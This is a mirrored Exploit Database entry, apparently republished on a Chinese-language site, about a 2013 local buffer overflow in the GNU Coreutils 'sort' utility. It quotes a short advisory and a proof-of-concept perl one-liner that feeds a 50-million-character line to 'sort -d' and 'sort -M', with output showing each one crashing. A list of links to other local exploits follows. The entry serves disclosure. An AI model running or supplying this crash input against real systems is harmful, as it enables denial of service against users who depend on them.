GNU Coreutils ‘sort’ Text Utility – Local Buffer Overflow

Exploit Database
106 阅读

作者： anonymous

日期： 2013-01-21
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/38232/

source: https://www.securityfocus.com/bid/57492/info

GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.

A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed. 

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13432 segmentation fault sort -d

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13434 segmentation fault sort -M

last Exploits
GNU Coreutils ‘sort’ Text Utility – Local Buffer Overflow的更多信息

AutoCAD DWG and DXF To PDF Converter 2.2 – Local Buffer Overflow：
Winamp 5.572 – Local Buffer Overflow (EIP + SEH) (DEP Bypass)：
Microsoft Fax – Cover Page Editor 5.2.3790.3959 Double-Free Memory Corruption：
BOINC Manager (Seti@home) 7.0.64 – Field Buffer Overflow (SEH)：
Easy WMV/ASF/ASX to DVD Burner 2.3.11 – Local Buffer Overflow (SEH)：
Gestionale Open 12.00.00 – ‘DB_GO_80’ Unquoted Service Path：
VirIT Explorer Lite & Pro 8.1.68 – Local Privilege Escalation：
Audiotran 1.4.2.4 – Local Overflow (SEH) (DEP Bypass)：